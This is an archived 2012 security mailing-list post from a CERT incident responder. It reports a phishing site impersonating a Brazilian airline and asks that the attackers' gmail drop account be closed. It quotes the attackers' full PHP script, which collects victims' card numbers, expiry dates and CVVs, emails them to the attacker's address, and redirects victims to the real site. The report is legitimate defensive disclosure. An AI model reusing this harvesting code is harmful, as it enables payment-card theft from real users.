[nsp-sec] Phishing-Dropbox @gmail.com
Torsten Voss
voss at dfn-cert.de
Mon Jun 4 06:31:39 EDT 2012
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hello,
we've found a phishing site with scripts of the attackers. The credentials
where send to 'spymove at gmail.com'
Please close this account.
Kind regards,
Torsten, AS680
<?php
if ( $_SERVER['REQUEST_METHOD'] == 'POST' ) {
$nome_site = 'by M4F10S0';
$email_site = 'spymove at gmail.com';
$email_send = 'spymove at gmail.com';
$nome = $_POST['nome'];
$numero = $_POST['numero'];
$bandeira = $_POST['bandeira'];
$mes = $_POST['mes'];
$ano = $_POST['ano'];
$cvv = $_POST['cvv'];
$assunto = "$$$ Tamo Rico . $bandeira";
if ( strpos( $_SERVER['HTTP_REFERER'], $_SERVER['SERVER_NAME'] ) > 0 ) { //
verifica se o servidor que ta o formulario 351 o mesmo que o chamou, se for um
ataque de inje347343o de dados este valor ser341 diferente
ini_set( 'sendmail_from', $email_site );
$msg = "Data: ".date("d/m/Y")." <br> Hor341rio: ".date("H:i:s")."<br>";
while( list( $campo, $valor ) = each( $HTTP_POST_VARS ) ) {
$msg .= "".ucwords($campo).": ".$valor."<br>";
}
$cabecalho = "Return-Path: ".$nome." <".$nome.">\r\n";
$cabecalho .= "From: ".$email_send." <".$bandeira.">\r\n";
$cabecalho .= "X-Priority: 3\r\n";
$cabecalho .= "X-Mailer: Formmail [version 1.0]\r\n";
$cabecalho .= "MIME-Version: 1.0\r\n";
$cabecalho .= "Content-Transfer-Encoding: 8bit\r\n";
$cabecalho .= 'Content-Type: text/html; charset="iso-8859-1"';
mail( $email_site, $assunto, $msg, $cabecalho );
header("Location: http://www.tam.com.br");
} else {
die( 'Detectada tentativa de inje347343o de dados, seu ip foi logado e
tomaremos as providencias legais' );
}
}
?>
- --
Dipl.-Ing.(FH) Torsten Voss (Incident Response Team), Phone +49 40 808077-634
DFN-CERT Services GmbH, https://www.dfn-cert.de, Phone +49 40 808077-590
Sitz / Register: Hamburg, AG Hamburg, HRB 88805, Ust-IdNr.: DE 232129737
Sachsenstrasse 5, 20097 Hamburg/Germany, CEO: Dr. Klaus-Peter Kossakowski
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.16 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAk/MjooACgkQLn8qYyAllOQaIACgjLFp491Vt5n+7ETT0mXXT4Nh
2JcAn0sLxLcpyS8KTFSY+asb4wjl3Egu
=n0Ya
-----END PGP SIGNATURE-----
More information about the nsp-security
mailing list